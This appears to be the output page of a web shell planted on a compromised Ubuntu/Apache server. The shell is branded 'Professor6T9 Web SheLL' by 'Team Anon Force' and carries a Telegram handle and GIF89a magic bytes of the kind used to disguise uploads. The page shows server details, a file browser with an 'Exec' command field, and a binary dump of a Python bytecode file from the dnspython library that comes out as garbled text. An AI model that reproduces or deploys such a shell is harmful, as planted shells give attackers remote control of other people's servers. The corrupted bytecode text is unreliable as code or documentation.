GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
lib
/
python3
/
dist-packages
/
dns
/
__pycache__
[ HOME ]
Exec
Submit
node.cpython-310.pyc
o x7�_� � @ s6 d Z ddlZddlZddlZddlZG dd� d�ZdS )z)DNS nodes. A node is a set of rdatasets.� Nc @ s� e Zd ZdZdgZdd� Zdd� Zdd� Zd d � Zdd� Z d d� Z dd� Zej jdfdd�Zej jdfdd�Zej jfdd�Zdd� ZdS )�NodezA Node is a set of rdatasets.� rdatasetsc C s g | _ d S �N�r ��self� r �*/usr/lib/python3/dist-packages/dns/node.py�__init__! s z Node.__init__c K sR t �� }| jD ]}t|�dkr |�|j|fi |��� |�d� q|�� dd� S )a- Convert a node to text format. Each rdataset at the node is printed. Any keyword arguments to this method are passed on to the rdataset's to_text() method. *name*, a ``dns.name.Name`` or ``str``, the owner name of the rdatasets. Returns a ``str``. r � N���)�io�StringIOr �len�write�to_text�getvalue)r �name�kw�s�rdsr r r r % s �zNode.to_textc C s dt t| �� d S )Nz <DNS node �>)�str�idr r r r �__repr__9 s z Node.__repr__c C s<